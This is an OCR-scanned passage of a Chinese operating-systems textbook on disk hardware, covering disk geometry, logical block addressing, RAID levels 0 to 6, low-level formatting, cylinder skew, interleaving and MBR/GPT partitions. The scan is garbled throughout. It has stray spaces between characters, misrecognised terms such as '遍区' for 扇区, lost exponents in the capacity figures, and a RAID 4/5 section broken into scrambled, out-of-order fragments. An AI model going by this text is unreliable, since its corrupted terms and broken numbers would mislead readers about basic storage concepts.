并 且 不 包含 运动 的 部 件 。 在 下 面 几 节 中 ， 我 们 将 讨论 磁盘 ， 以 此 作为 硬件 的 例子 ， 然 后 对 磁盘 设备 的 软 


当 一 个 用 户 程 序 试图 从 一 个 文件 中 读 一 个 “请 求 式 化 ， 假 脱 机 
则 调用 设备 驱动 程序 ， 向 硬件 发 出 一 个 请 

当 磁 盘 操 作 完成 时 ， 硬 件 产生 一 个 中 图 5-17 IO 系统 的 层次 以 及 每 一 层 的 主要 功能 
5.4 盘 

盘 具 有 多 种 多 样 的 类 型 。 最 为 常用 的 是 磁盘 ， 它 们 具有 读 写 速度 同样 快 的 特点 ， 这 使 得 它们 适合 作 
件 进 行 一 般 性 的 描述 。 
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1. 磁盘 

磁盘 被 组 织 成 柱 面 ， 每 一 个 柱 面 包含 若干 磁道 ， 磁 道 数 与 垂直 堆 又 的 磁头 个 数 相同 。 磁 道 又 被 分 成 
若干 遍 区 ， 软 盘 上 大 约 每 条 磁道 有 8 一 32 个 扇 区 ， 硬 盘 上 每 条 磁道 上 扇 区 的 数目 可 以 多 达 几 百 个 。 磁 头 
数 大 约 是 1 一 16 个 。 

老式 的 磁盘 只 有 少量 的 电子 设备 ， 它 们 只 是 传送 简单 的 串 行 位 流 。 在 这 些 磁盘 上 ， 控 制 器 做 了 大 部 
分 的 工作 。 在 其 他 磁盘 上 ， 特 别 是 在 IDE (Integrated Drive Electronics， 集 成 驱动 电子 设备 ) 和 SATA 
(Serial ATA， 串 行 ATA) 盘 上 ， 磁 盘 驱 动 器 本 身 包含 一 个 微 控 制 器 ,该 微 控制 器 承担 了 大 量 的 工作 并 且 
允许 实际 的 控制 器 发 出 一 组 高 级 命令 。 控 制 器 经 常 做 磁道 高 速 缓存 、 坏 块 重 映射 以 及 更 多 的 工作 。 

对 磁盘 驱动 程序 有 重要 意义 的 一 个 设备 特性 是 : 控制 器 是 否 可 以 同时 控制 两 个 或 多 个 驱动 器 进行 寻 
i, AMEER (overlapped seek)。 当 控制 器 和 软件 等 待 一 个 驱动 器 完成 寻 道 时 ， 控 制 器 可 以 同时 
启动 另 一 个 驱动 器 进行 寻 道 。 许 多 控制 器 也 可 以 在 一 个 驱动 器 上 进行 读 写 操 作 ， 与 此 同时 再 对 另 一 个 或 
多 个 其 他 驱动 器 进行 寻 道 ， 但 是 软盘 控制 器 不 能 在 两 个 驱动 器 上 同时 进行 读 写 操作 。( 读 写 数据 要 求 控 
制 器 在 微 秒 级 时 间 尺 度 传输 数据 ， 所 以 一 次 传输 就 用 完了 控制 器 大 部 分 的 计算 能 力 。) 对 于 具有 集成 控 
制 器 的 硬盘 而 言情 况 就 不 同 了 ， 在 具有 一 个 以 上 这 种 硬盘 驱动 器 的 系统 上 ， 它 们 能 够 同时 操作 ， 至 少 在 
磁盘 与 控制 器 的 缓冲 存储 器 之 间 进 行 数据 传 输 的 限度 之 内 是 这 样 。 然 而 ， 在 控制 器 与 主 存 之 间 可 能 同时 
只 有 一 次 传输 。 同 时 执行 两 个 或 多 个 操作 的 能 力 极 大 地 降低 了 平均 存 取 时 间 。 

图 5-18 比 较 了 最 初 的 IBM PC 标准 存储 介质 的 参数 与 3 0 年 后 制造 的 磁盘 的 参数 ， 从 中 可 以 看 出 这 
段 时 间 里 磁盘 发 生 了 多 大 的 变化 。 有 趣 的 是 ， 可 以 注意 到 并 不 是 所 有 的 参数 都 具有 同样 程度 的 改进 。 平 
均 寻 道 时 间 改 进 了 差不多 9 倍 ， 传 输 率 改进 了 16 000 倍 ， 而 容量 的 改进 则 高 达 800 000 倍 。 这 一 格局 主要 
是 因为 磁盘 中 运动 部 件 的 改进 相对 来 说 和 缓 渐进， 而 记录 表面 则 达到 了 相当 高 的 位 密度 。 
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图 5-18 最 初 的 IBM PC 360-KB 软 盘 参 数 与 西部 数据 公司 WD 3000 HLFS (Velociraptor， 速 龙 ) 硬盘 参数 


在 阅读 现代 硬盘 的 说 明 书 时 ， 要 清楚 的 事情 是 标 称 的 几何 规格 以 及 驱动 程序 软件 使 用 的 几何 规格 与 
物理 格式 几乎 总 是 不 同 的 。 在 老式 的 磁盘 上 ， 每 磁道 扇 区 数 对 所 有 柱 面 都 是 相同 的 。 而 现代 磁盘 则 被 划 
分 成 环 带 ， 外 层 的 环 带 比 内 层 的 环 带 拥有 更 多 的 扇 区 。 图 5-19a 所 示 为 一 个 微小 的 磁盘 ， 它 具有 两 个 环 
带 ， 外 层 的 环 带 每 磁道 有 32 个 扇 区 ， 内 层 的 环 带 每 磁道 有 16 个 扇 区 。 一 个 实际 的 磁盘 (例如 WD 3000 
HLFS) 常常 有 16 个 环 带 ， 从 最 内 层 的 环 带 到 最 外 层 的 环 带 ， 每 个 环 带 的 扇 区 数 增 加 大 约 4%。 

为 了 隐藏 每 个 磁道 有 多 少 扇 区 的 细节 ， 大 多 数 现代 磁盘 都 有 一 个 虚拟 几何 规格 呈现 给 操作 系统 。 软 
件 在 工作 时 仿佛 存在 着 x 个 柱 面 、y 个 磁头 、 每 磁道 z 个 扁 区 ， 而 控制 器 则 将 对 (x, y, z) 的 请 求 重 映射 到 实 
际 的 柱 面 、 磁 头 和 扇 区 。 对 于 图 5$-19a 中 的 物理 磁盘 ， 一 种 可 能 的 虚拟 几何 规格 如 图 5-19b 所 示 。 在 两 种 
情形 中 磁盘 拥有 的 扇 区 数 都 是 192， 只 不 过 公布 的 排列 与 实际 的 排列 是 不 同 的 。 

对 于 PC 而 言 ， 上 述 三 个 参数 的 最 大 值 常 常 是 (65 535，16，63) ， 这 是 因为 需要 与 最 初 IJBM PC 的 限 
制 向 后 兼容 。 在 IBM PC 器 上 ， 使 用 16 位 、4 位 和 6 位 的 字段 来 设 定 这 些 参数 ， 其 中 柱 面 和 遍 区 从 1 开始 编 
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号 ， 磁 头 从 0 开始 编号 。 根 据 这 些 参 数 以 及 每 个 扇 区 512 字 节 可 知 ， 磁 盘 最 大 可 能 的 容量 是 31.5GB 。 为 突 
破 这 一 限制 ， 所 有 现代 磁盘 现在 都 支持 一 种 称 为 逻辑 块 寻 址 (logical block addressing, LBA) 的 系统 ， 
在 这 样 的 系统 中 ， 磁 盘 扇 区 从 0 开始 连续 编号 ， 而 不 管 磁盘 的 几何 规格 如 何 。 





图 5-19 a) 具有 两 个 环 带 的 磁盘 的 物理 几何 规格 ，b) 该 磁盘 的 一 种 可 能 的 虚拟 几何 规格 


2. RAID 

在 过 去 十 多 年 里 ，CPU 的 性 能 一 直 呈 现 出 指数 增长 ， 大 体 上 每 18 个 月 翻 一 番 。 但 是 磁盘 的 性 能 就 不 
是 这 样 了 。20 世 纪 70 年 代 ， 小 型 计算 机 磁盘 的 平均 寻 道 时 间 是 50~ 100 毫 秒 ， 现 在 的 寻 道 时 间 略 微 低 于 
10 毫 秒 。 在 大 多 数 技术 产业 〈 如 汽车 业 或 航空 业 ) 中 ,在 20 年 之 内 有 5~ 10 倍 的 性 能 改进 就 将 是 重大 的 
新 闻 (想象 300 MPG 的 轿车 9), 但 是 在 计算 机 产业 中 ， 这 却 是 一 个 窘境 。 因 此 ，CPU 性 能 与 ( 硬 ) 盘 
性 能 之 间 的 差距 随 着 时 间 的 推移 将 越 来 越 大 。 对 此 我 们 能 做 些 有 帮助 的 事情 吗 ? 

是 的 ! 正如 我 们 已 经 看 到 的 ， 为 了 提高 CPU 的 性 能 ， 越 来 越 多 地 使 用 了 并 行 处 理 。 在 过 去 许多 年 ， 很 
多 人 也 意识 到 并 行 O 是 一 个 很 好 的 思想 。Patterson 等 人 在 他 们 1988 年 写 的 文章 中 提出 ， 使 用 六 种 特殊 的 磁 
盘 组 织 可 能 会 改进 磁盘 的 性 能 、 可 靠 性 或 者 同时 改进 这 两 者 (Patterson 等 人 ，1988) 。 这 些 思想 很 快 被 工 
业界 所 采纳 ， 并 且 导 致 称 为 RAID 的 一 种 新 型 IO 设备 的 诞生 。Patterson 等 人 将 RAID 定 义 为 Redundant 
Array of Inexpensive Disk (廉价 磁盘 元 余 阵 列 ) ， 但 是 工业 界 将 I 重 定义 为 Independent (独立 ) 而 不 是 
Inexpensive (廉价 )， 或许 这 样 他 们 就 可 以 收取 更 多 的 费用 ? 因为 反面 角色 也 是 需要 的 (如同 RISC 对 CISC， 
这 也 是 源 于 Patterson)， 此 处 的 “ 坏 家 伙 ” 是 SLED (Single Large Expensive Disk， 单 个 大 容量 昂贵 磁盘 )。 

RAID 背 后 的 基本 思想 是 将 一 个 装 满 了 磁盘 的 盒子 安装 到 计算 机 (通常 是 一 个 大 型 服务 器 ) 上 ， 用 
RAID 控 制 器 替换 磁盘 控制 器 卡 ， 将 数据 复制 到 整个 RAID 上 ， 然 后 继续 常规 的 操作 。 换 言 之 ， 对 操作 系 
统 而 言 一 个 RAID 应 该 看 起 来 就 像 是 一 个 SLED， 但 是 具有 更 好 的 性 能 和 更 好 的 可 靠 性 。 由 于 SCSI 盘 具有 
良好 的 性 能 、 较 低 的 价格 并 且 在 单个 控制 器 上 能 够 容纳 多 达 7 个 驱动 器 (对 宽 型 SCSI 而 言 是 15 个 ) RA 
然 地 大 多 数 RAID 由 一 个 RAID SCSI 控 制 器 加 上 一 个 装 满 了 SCSI 盘 的 盒子 组 成 ， 而 对 操作 系统 而 言 这 似 
平 就 是 一 个 大 容量 磁盘 。 以 这 样 的 方法 ， 不 需要 软件 做 任何 修改 就 可 以 使 用 RAID， 对 于 许多 系统 管理 
员 来 说 这 可 是 一 大 卖点 。 

除了 对 软件 而 言 看 起 来 就 像 是 一 个 磁盘 以 外 ， 所 有 的 RAID 都 具有 同样 的 特性 ， 那 就 是 将 数据 分 布 
在 全 部 驱动 器 上 ， 这 样 就 可 以 并 行 操 作 。Patterson 等 人 为 这 样 的 操作 定义 了 几 种 不 同 的 模式 。 如 今 ， 大 
多 数 制 造 商 将 七 种 标准 配置 称 为 0 级 RAID 到 6 级 RAID。 此 外 ， 还 有 少许 其 他 的 辅助 层级 ， 我 们 就 不 讨论 
了 。“ 层 级 ”这 一 术语 多 少 有 一 些 用 词 不 当 ， 因 为 此 处 不 存在 分 层 结 构 ， 它 们 只 是 可 能 的 七 种 不 同 组 织 
形式 而 已 。 

0 级 RAID 如 图 5-20a 所 示 。 它 将 RAID 模 拟 的 虚拟 单个 磁盘 划分 成 条 带 ， 每 个 条 带 具 有 K 个 遍 区 ， 其 
中 遍 区 0 一 儿 1 为 条 带 0， 遍 区 K~ 2 一 1 为 条 带 1， 以 此 类 推 。 如 果 上 = 1， 则 每 个 条 带 是 一 个 扇 区 ， 如 果 = 


© MPG 是 Miles Per Gallon 的 缩写 ， 即 每 加 仓 燃油 可 以 跑 多 少 英里 。 各 国政 府 对 车 辆 燃油 经 济 性 的 要 求 越 来 越 
高 ， 目 前 30 MPG 标 准 成 为 衡量 各 家 公司 车 型 竞争 力度 的 标杆 。 一 一 译 者 注 
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2， 则 每 个 条 带 是 两 个 扁 区 ， 以 此 类 推 。0 级 RAID 结 构 将 连续 的 条 带 以 轮转 方式 写 到 全 部 驱动 器 上 ， 
图 5-20a 所 示 为 具有 四 个 磁盘 驱动 器 的 情形 。 

像 这 样 将 数据 分 布 在 多 个 驱动 器 上 称 为 划分 条 带 (striping)。 例 如 ， 如 果 软 件 发 出 一 条 命令 ， 读 取 
一 个 由 四 个 连续 条 带 组 成 的 数据 块 ， 并 且 数 据 块 起 始 于 条 带 边 界 ， 那 么 RAID 控 制 器 就 会 将 该 命令 分 解 
为 四 条 单独 的 命令 ， 每 条 命令 对 应 四 块 磁盘 中 的 一 块 ， 并 且 让 它们 并 行 操作 。 这 样 我 们 就 运用 了 并 行 
IO 而 软件 并 不 知道 这 一 切 。 

0 级 RAID 对 于 大 数据 量 的 请 求 工作 性 能 最 好 ， 数 据 量 越 大 性 能 就 越 好 。 如 果 请 求 的 数据 量 大 于 驱动 
器 数 乘 以 条 带 大 小 ， 那 么 某 些 驱动 器 将 得 到 多 个 请 求 ， 这 样 当 它们 完成 了 第 一 个 请 求 之 后 ， 就 会 开始 处 
理 第 二 个 请 求 。 控 制 器 的 责任 是 分 解 请 求 ， 并 且 以 正确 的 顺序 将 适当 的 命令 提供 给 适当 的 磁盘 ， 之 后 还 
要 在 内 存 中 将 结果 正确 地 装配 起 来 。0 级 RAID 的 性 能 是 杰出 的 而 实现 是 简单 明了 的 。 

对 于 习惯 于 每 次 请 求 一 个 扇 区 的 操作 系统 ，0 级 RAID 工 作 性 能 最 为 糟糕 。 虽 然 结果 会 是 正确 的 ， 但 
是 却 不 存在 并 行 性 ， 因 此 也 就 没有 增进 性 能 。 这 一 结构 的 另 一 个 劣势 是 其 可 靠 性 潜在 地 比 SLED 还 要 差 。 
如 果 一 个 RAID 由 四 块 磁盘 组 成 ， 每 块 磁盘 的 平均 故障 间隔 时 间 是 20 000 小 时 ， 那 么 每 隔 5000 小 时 就 会 
有 一 个 驱动 器 出 现 故障 并 且 所 有 数据 将 完全 丢失 。 与 之 相 比 ， 平 均 故 障 间 隔 时 间 为 20 000 小 时 的 SLED 
的 可 靠 性 要 高 出 四 倍 。 由 于 在 这 一 设计 中 未 引入 宛 余 ， 实 际 上 它 还 不 是 真正 的 RAID。 

下 一 个 选择 一 一 1 级 RAID 如 图 5-20b 所 示 ， 这 是 一 个 真正 的 RAID。 它 复制 了 所 有 的 磁盘 ， 所 以 存在 
四 个 主 磁盘 和 四 个 备份 磁盘 。 在 执行 一 次 写 操作 时 ， 每 个 条 带 都 被 写 了 两 次 。 在 执行 一 次 读 操作 时 ， 则 
可 以 使 用 其 中 的 任意 一 个 副本 ， 从 而 将 负荷 分 布 在 更 多 的 驱动 器 上 。 因 此 ， 写 性 能 并 不 比 单个 驱动 器 好 ， 
但 是 读 性 能 能 够 比 单个 驱动 器 高 出 两 倍 。 容 错 性 是 突出 的 : 如 果 一 个 驱动 器 崩溃 了 ， 只 要 用 副本 来 替代 
就 可 以 了 。 恢 复 也 十 分 简单 ， 只 要 安装 一 个 新 驱动 器 并 且 将 整个 备份 驱动 器 复制 到 其 上 就 可 以 了 。 

0 级 RAID 和 1 级 RAID 操 作 的 是 局 区 条 带 ， 与 此 不 同 ，2 级 RAID 工 作 在 字 的 基础 上 ， 甚 至 可 能 是 字 节 的 
基础 上 。 想 象 一 下 将 单个 虚拟 磁盘 的 每 个 字 节 分 割 成 4 位 的 半 字 节 对 ， 然 后 对 每 个 半 字 节 加 入 一 个 汉 明码 从 
而 形成 7 位 的 字 ， 其 中 1、2、4 位 为 奇偶 校 验 位 。 进 一 步 想象 如 图 5-20c 所 示 的 7 个 驱动 器 在 磁盘 臂 位 置 与 旋 
转 位 置 方面 是 同步 的 。 那 么 ， 将 7 位 汉 明 编 码 的 字 写 到 7 个 驱动 器 上 ， 每 个 驱动 器 写 一 位 ， 这 样 做 是 可 行 的 。 

Thinking Machine 公 司 的 CM-2 计 算 机 采用 了 这 一 方案 ， 它 采用 32 位 数据 字 并 加 入 6 个 奇偶 校 验 位 形 
成 一 个 38 位 的 汉 明 字 ， 再 加 上 一 个 额外 的 位 用 于 汉 明 字 的 奇偶 校 验 ， 并 且 将 每 个 字 分 布 在 39 个 磁盘 驱动 
器 上 。 因 为 在 一 个 扇 区 时 间 里 可 以 写 32 个 遍 区 的 数据 ， 所 以 总 的 吞吐 量 是 巨大 的 。 此 外 ， 一 个 驱动 器 的 
损坏 不 会 引起 问题 ， 因 为 损坏 一 个 驱动 器 等 同 于 在 每 个 39 位 字 的 读 操 作 中 损失 一 位 ， 而 这 是 汉 明码 可 以 
轻松 处 理 的 事情 。 

不 利 的 一 面 是 ， 这 一 方案 要 求 所 有 驱动 器 的 旋转 必须 同步 ， 并 且 只 有 在 驱动 器 数量 很 充裕 的 情况 下 
才 有 意义 (即使 对 于 32 个 数据 驱动 器 和 6 个 奇偶 驱动 器 而 言 ， 也 存在 19% 的 开销 )。 这 一 方案 还 对 控制 器 
提出 许多 要 求 ， 因 为 它 必须 在 每 个 位 时 间 里 求 汉 明 校 验 和 。 

3 级 RAID 是 2 级 RAID 的 简化 版 本 ， 如 图 5-20d 所 示 。 其 中 要 为 每 个 数据 字 计 算 一 个 奇偶 校 验 位 并 且 
将 其 写 入 一 个 奇偶 驱动 器 中 。 与 2 级 RAID 一 样 ， 各 个 驱动 器 必须 精确 地 同步 ， 因 为 每 个 数据 字 分 布 在 多 
个 驱动 器 上 。 

乍 一 想 ， 似 乎 单个 奇偶 校 验 位 只 能 检测 错误 ， 而 不 能 纠正 错误 。 对 于 随机 的 未 知 错误 的 情形 ， 这 样 
的 看 法 是 正确 的 。 然 而 ， 对 于 驱动 器 崩溃 这 样 的 情形 ， 由 于 坏 位 的 位 置 是 已 知 的 ， 所 以 这 样 做 完全 能 够 纠 
正 1 位 错误 。 如 果 发 生 了 一 个 驱动 器 崩溃 的 事件 ， 控 制 器 只 需 假装 该 驱动 器 的 所 有 位 为 0%， 如 果 一 个 字 有 奇 
侦 错 误 ， 那 么 来 自 废弃 了 的 驱动 器 上 的 位 原来 一 定 是 1， 这 样 就 纠正 了 错误 。 尽 管 2 级 RAID 和 3 级 RAID 两 
者 都 提供 了 非常 高 的 数据 率 ， 但 是 每 秒 钟 它们 能 够 处 理 的 单独 的 VO 请 求 的 数目 并 不 比 单个 驱动 器 好 。 

4 级 RAID 和 5 级 RAID 再 次 使 用 条 带 ， 而 不 是 具有 奇偶 校 验 的 单个 字 。 如 图 5-20e 所 示 ，4 级 RAID 与 0 
级 RAID 相 类 似 , 但 是 它 将 条 带 对 条 带 的 奇偶 条 带 写 到 一 个 额外 的 磁盘 上 。 例 如 ， 如 果 每 个 条 带 k 字 节 长 ， 
那么 所 有 的 条 带 进行 异 或 操作 ， 就 得 到 一 个 k 字 节 长 的 奇偶 条 带 。 如 果 一 个 驱动 器 崩溃 了 ， 则 损失 的 字 
节 可 以 通过 读 出 整个 驱动 器 组 从 奇偶 驱动 器 重新 计算 出 来 。 

这 一 设计 对 一 个 驱动 器 的 损失 提供 了 保护 ， 但 是 对 于 微小 的 更 新 其 性 能 很 差 。 如 果 一 个 扇 区 被 修改 
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奇偶 校 验 。 作 为 另 一 选择 ， 
奇偶 校 验 。 即 使 是 对 于 这 样 


与 


a 


了 ， 那 么 就 必须 读 取 所 有 的 驱动 器 以 便 重新 计算 奇偶 校 验 ， 然 后 还 必须 重 


它们 重新 计算 新 的 


它 也 可 以 读 取 旧 的 用 户 数据 和 旧 的 奇偶 校 验 数据 ， 并 且 用 
的 优化 ， 微 小 的 更 新 也 还 是 需要 两 次 读 和 两 次 


5. 


环 方式 在 所 有 驱动 器 上 均匀 
一 个 驱动 器 发 生 崩 溃 ， 重 新 


5 级 RAID 消 除了 这 一 瓶颈 ， 如 图 5-20f 所 示 。 然 而 ， 如 果 


结果 ， 奇 偶 驱 动 器 的 负担 十 分 沉重 ， 它 可 能 会 成 为 一 个 瓶颈 。 通 过 以 循 
构造 故障 驱动 器 的 内 容 是 一 个 非常 复杂 的 过 程 。 


地 分 布 奇偶 校 验 位 ， 





图 5-20 0 级 RAID 到 6 级 RAID (备份 驱动 器 和 奇偶 驱动 器 以 阴影 显示 ) 
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6 级 RAID 与 5 级 RAID 相 似 ， 区 别 在 于 前 者 使 用 了 额外 的 奇偶 块 。 换 名 话说 ， 跨 磁盘 分 条 带 的 数据 具 
有 两 个 奇偶 块 ， 而 不 是 一 个 奇偶 块 。 结 果 ， 写 的 代价 要 更 高 一 点 ， 因 为 要 做 奇偶 计算 ,但 是 读 不 会 招致 
任何 性 能 惩罚 。 它 确实 能 够 提供 更 高 的 可 靠 性 (想象 一 下 当 5 级 RAID 正 在 重建 其 阵列 时 如 果 遭 遇 一 个 坏 
块 会 发 生 什么 事情 )。 
5.4.2 磁盘 格式 化 

硬盘 由 一 登 铝 的 、 合 金 的 或 玻璃 的 盘 片 组 成 ， 典 型 的 直径 为 3.5 英 寸 (或 者 在 笔记 本 电脑 上 是 2.5 英 
寸 )。 在 每 个 盘 片上 沉积 着 薄 薄 的 可 磁化 的 金属 氧化 物 。 在 制造 出 来 之 后 ， 磁 盘 上 不 存在 任何 信息 。 

在 磁盘 能 够 使 用 之 前 ， 每 个 盘 片 必须 经 受 由 软件 完成 的 低级 格式 化 (low-level format) 。 该 格式 包含 
一 系列 同心 的 磁道 ， 每 个 磁道 包含 若干 数目 的 扁 区 ， 遍 区间 存在 短 的 间隙 。 一 个 扇 区 的 格式 如 图 5-21 所 示 。 

前 导 码 以 一 定 的 位 模式 开始 ， 位 模式 使 硬件 得 以 识别 扇 区 的 开始 。 前 导 码 还 包含 柱 面 与 扇 区 号 以 及 
某 些 其 他 信息 。 数 据 部 分 的 大 小 是 由 低级 格 


式 化 程序 决定 的 ， 大 多 数 磁盘 使 用 512 字 节 em] Be 
的 扁 区 。ECC 域 包含 宛 余 信息 ， 可 以 用 来 恢 S 
复读 错误 。 该 域 的 大 小 和 内 容 随 生产 商 的 不 图 5-21 一 个 磁盘 局 区 


同 而 不 同 ， 它 取决 于 设计 者 为 了 更 高 的 可 靠 
性 愿意 放弃 多 少 磁盘 空间 以 及 控制 器 能 够 处 
理 的 ECC 编 码 有 多 复杂 。16 字 节 的 ECC 域 并 
不 是 罕见 的 。 此 外 ， 所 有 硬盘 都 分 配 有 某 些 
数目 的 备用 扇 区 ， 用 来 取代 具有 制造 瑕 症 的 
mk. 

在 设置 低级 格式 时 ， 每 个 磁道 上 第 0 扇 
区 的 位 置 与 前 一 个 磁道 存在 偏 移 。 这 一 偏 移 
称 为 柱 面 斜 进 (cylinder skew)， 这 样 做 是 为 
了 改进 性 能 ， 想 法 是 让 磁盘 在 一 次 连续 的 
操作 中 读 取 多 个 磁道 而 不 丢失 数据 。 观 察 
图 5-19a 就 可 以 明白 问题 的 本 质 。 假 设 一 个 读 
请 求 需要 最 内 侧 磁道 上 从 第 0 扇 区 开始 的 18 
个 扇 区 ， 磁 盘旋 转 一 周 可 以 读 取 前 16 个 扇 区， 
但 是 为 了 得 到 第 17 个 遍 区 ， 则 需要 一 次 寻 道 
操作 以 便 磁 头 向 外 移动 一 个 磁道 。 到 磁头 移 
动 了 一 个 磁道 时 ， 第 0 扇 区 已 经 转 过 了 磁头 ， 
所 以 需要 旋转 一 整 周 才能 等 到 它 再 次 经 过 磁 图 5-22 柱 面 斜 进 示意 图 
头 。 通 过 图 5-22 所 示 的 将 扇 区 偏 移 即 可 消除 
这 一 问题 。 

柱 面 斜 进 量 取决 于 驱动 器 的 几何 规格 。 例 如 ， 一 个 10 000rpm 的 驱动 器 每 6ms 旋 转 一 周 ， 如 果 一 个 
磁道 包含 300 个 扇 区 ， 那 么 每 20us 就 有 一 个 新 扇 区 在 磁头 下 通过 。 如 果 磁 道 到 磁道 的 寻 道 时 间 是 800us， 
那么 在 寻 道 期 间 将 有 40 个 扇 区 通过 ， 所 以 柱 面 斜 进 应 该 是 40 个 扇 区 而 不 是 图 5$-22 中 的 三 个 扇 区 。 值 得 一 
提 的 是 ， 像 柱 面 斜 进 一 样 也 存在 着 磁头 斜 进 (head skew) ， 但 是 磁头 斜 进 不 是 很 大 ， 通 常 远 小 于 一 个 扇 
区 的 时 间 。 

低级 格式 化 的 结果 是 磁盘 容量 减少 ， 减 少 的 量 取决 于 前 导 码 、 遍 区间 间 阶 和 ECC 的 大 小 以 及 保留 的 
备用 扇 区 的 数目 。 通 常 格式 化 的 容量 比 未 格式 化 的 容量 低 20% 。 备 用 扇 区 不 计 和 格式 化 的 容量 ， 所 以 一 
种 给 定 类 型 的 所 有 磁盘 在 出 厂 时 具有 完全 相同 的 容量 ， 与 它们 实际 具有 多 少 坏 遍 区 无 关 (如 果 坏 扇 区 的 
数目 超出 了 备用 扇 区 的 数目 ， 则 该 驱动 器 是 不 合格 的 ， 不 会 出 厂 ) 。 

关于 磁盘 容量 存在 着 相当 大 的 混淆 ， 这 是 因为 某 些 制造 商 广告 宣传 的 是 未 格式 化 的 容量 ， 从 而 使 他 
们 的 驱动 器 看 起 来 比 实际 的 容量 要 大 。 例 如 ， 考 虑 一 个 未 格式 化 容量 为 200 x 10" 字 节 的 驱动 器 ， 它 或 许 
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是 作为 200GB 的 磁盘 销售 的 。 然 而 ， 格 式 化 之 后 ， 也 许 只 有 170 x 10? 字 节 可 用 于 存放 数据 。 使 这 一 混 清 
进一步 加 剧 的 是 操作 系统 可 能 将 这 一 容量 报告 为 158GB， 而 不 是 170GB， 因 为 软件 把 1GB 看 作 2” 
(1 073 741 824) 字 节 ， 而 不 是 10”(1 000 000 000) 字 节 。 如 果 将 其 报告 为 158GiB 或 许 更 好 一 些 。 

在 数据 通信 世界 里 ，1Gb/s 意 味 着 1 000 000 000 位 / 秒 ， 因 为 前 级 G (E) 确实 表示 10”( 毕 竟 一 千 米 
是 1000 米 ， 而 不 是 1024 米 ) ， 所 以 使 事情 更 加 精 糕 。 只 有 在 关于 内 存 和 磁盘 的 大 小 的 情况 下 ，kilo (F), 
mega (Jk), giga ( 吉 ) 和 tera ( 太 ) 才 分 别 表示 2"、2”、2” 和 2”。 

为 避免 混淆 ， 有 些 作者 使 用 前 级 kilo、mega、giga 和 tera 分 别 表示 10”、10*、10? 和 10”， 使 用 kibi、 
′ mebi、gibi 和 tebi 分 别 表示 2*、2”、23?” 和 2”。 然 而 ， 前 级 “b” 的 使 用 是 比较 少 的 。 以 防 万 一 你 实在 喜欢 
大 数字 ， 我 再 介绍 一 下 ， 跟 随 在 tebi 之 后 的 前 缀 是 pebi、exbi、zebi 和 yobi， 所 以 yobibyte 是 一 大 串 字 节 
(精确 地 说 是 2” 字 节 )。 

格式 化 还 对 性 能 产生 影响 。 如 果 一 个 10 000RPM 的 磁盘 每 个 磁道 有 300 个 遍 区 ， 每 个 遍 区 512 字 节 ， 
那么 用 6ms 可 以 读 出 一 个 磁道 上 的 153 600 字 节 ， 使 数据 率 为 25 600 000 字 节 / 秒 或 24.4 MB/s。 不 论 引 入 
什么 种 类 的 接口 ， 都 不 可 能 比 这 个 速度 更 快 ， 即 便 是 80 MB/s 或 160 MB/s 的 SCSI 接 口 也 不 行 。 

实际 上 ， 以 这 一 速率 连续 地 读 磁盘 要 求 控制 器 中 有 一 个 大 容量 的 缓冲 区 。 例 如 ， 考 虑 一 个 控制 器 ， 
它 具 有 一 个 扇 区 的 缓冲 区 ， 该 控制 器 接 到 一 条 命令 要 读 两 个 连续 的 扇 区 。 当 从 磁盘 上 读 出 第 一 个 遍 区 并 
做 了 ECC 计 算 之 后 ， 数 据 必 须 传送 到 主 存 中 。 就 在 传送 正在 进行 时 ， 下 一 个 扁 区 将 从 磁头 下 通过 。 当 完 
成 了 向 主 存 的 复制 时 ， 控 制 器 将 不 得 不 等 待 几乎 一 整 周 的 旋转 时 间 才 能 等 到 第 二 个 扇 区 再 次 回来 。 

通过 在 格式 化 磁盘 时 以 交错 方式 对 遍 区 进行 编号 可 以 消除 这 一 问题 。 在 图 5-23a 中 ， 我 们 看 到 的 是 
通常 的 编号 模式 (此 处 忽略 柱 面 斜 进 )。 在 图 5-23b 中 ， 我 们 看 到 的 是 单 交 错 (single interleaving)， 它 可 
以 在 连续 的 扁 区 之 间 给 控制 器 以 员 息 的 空间 以 便 将 缓冲 区 复制 到 主 存 。 


图 5-23 a) 无 交错 ; b) 单 交 错 ; c) 双 交 错 


如 果 复 制 过 程 非常 慢 ， 可 能 需要 如 图 5-23c 中 的 双 交 错 (double interleaving)。 如 果 控 制 器 拥有 的 缓 
冲 区 只 有 一 个 扇 区 ， 那 么 从 缓冲 区 到 主 存 的 复制 无 论 是 由 控制 器 完成 还 是 由 主 CPU 或 者 DMA 芯 片 完 成 
都 无 关 紧 要 ， 都 要 花费 某 些 时 间 。 为 了 避免 需要 交错 ， 控 制 器 应 该 能 够 对 整个 磁道 进行 缓存 。 大 多 数 现 
代 控 制 器 都 能 够 对 多 个 整 磁道 进行 缓冲 。 

在 低级 格式 化 完成 之 后 ， 要 对 磁盘 进行 分 区 。 在 逻辑 上 ， 每 个 分 区 就 像 是 一 个 独立 的 磁盘 。 分 区 对 
于 实现 多 个 操作 系统 共存 是 必需 的 。 此 外 ， 在 某 些 情况 下 ， 分 区 可 以 用 来 进行 交换 。 在 x86 和 大 多 数 其 
他 计算 机 上 ，0 扇 区 包含 主 引 导 记 录 (Master Boot Record，MBR ) ， 它 包含 某 些 引导 代码 以 及 处 在 扇 区 
末尾 的 分 区 表 。MBR 以 及 对 于 分 区 表 的 支持 于 1983 年 首次 出 现在 IBM PC 中 ， 以 支持 PC XT 中 在 当时 看 
来 是 大 容量 的 10MB 硬 盘 驱 动 器 。 从 那 以 后 ， 磁 盘 一 直 在 成 长 。 因 为 在 大 多 数 系统 中 MBR 分 区 表 项 限于 
32 位 ， 所 以 对 于 512B 扇 区 的 磁盘 而 言 ， 能 够 支持 的 最 大 磁盘 大 小 是 2TB。 由 于 这 一 原因 ， 大 多 数 操作 
系统 现在 支持 新 的 GPT (GUID Partition Table，GUID 分 区 表 ) ， 它 可 以 支持 的 磁盘 大 小 高 达 9.4ZB 
(9 444 732 965 739 290 426 880 字 节 ) 。 在 本 书 出 版 之 时 ， 这 会 被 认为 是 很 多 的 字 节 。 

在 x86 上 ，MBR 分 区 表 具 有 四 个 分 区 的 空间 。 如 果 这 四 个 分 区 都 用 于 Windows， 那 么 它们 将 被 称 为 
C:、D:、E: 和 F:， 并 且 作 为 单独 的 驱动 器 对 待 。 如 果 它 们 中 有 三 个 用 于 Windows 一 个 用 于 UNIX， 那 
` 么 Windows 会 将 它 的 分 区 称 为 C:、D: 和 E:。 如 果 添 加 一 个 USB 驱 动 器 ， 它 将 是 F:。 为 了 能 够 从 硬盘 引 
导 ， 在 分 区 表 中 必须 有 一 个 分 区 被 标记 为 活动 的 。 
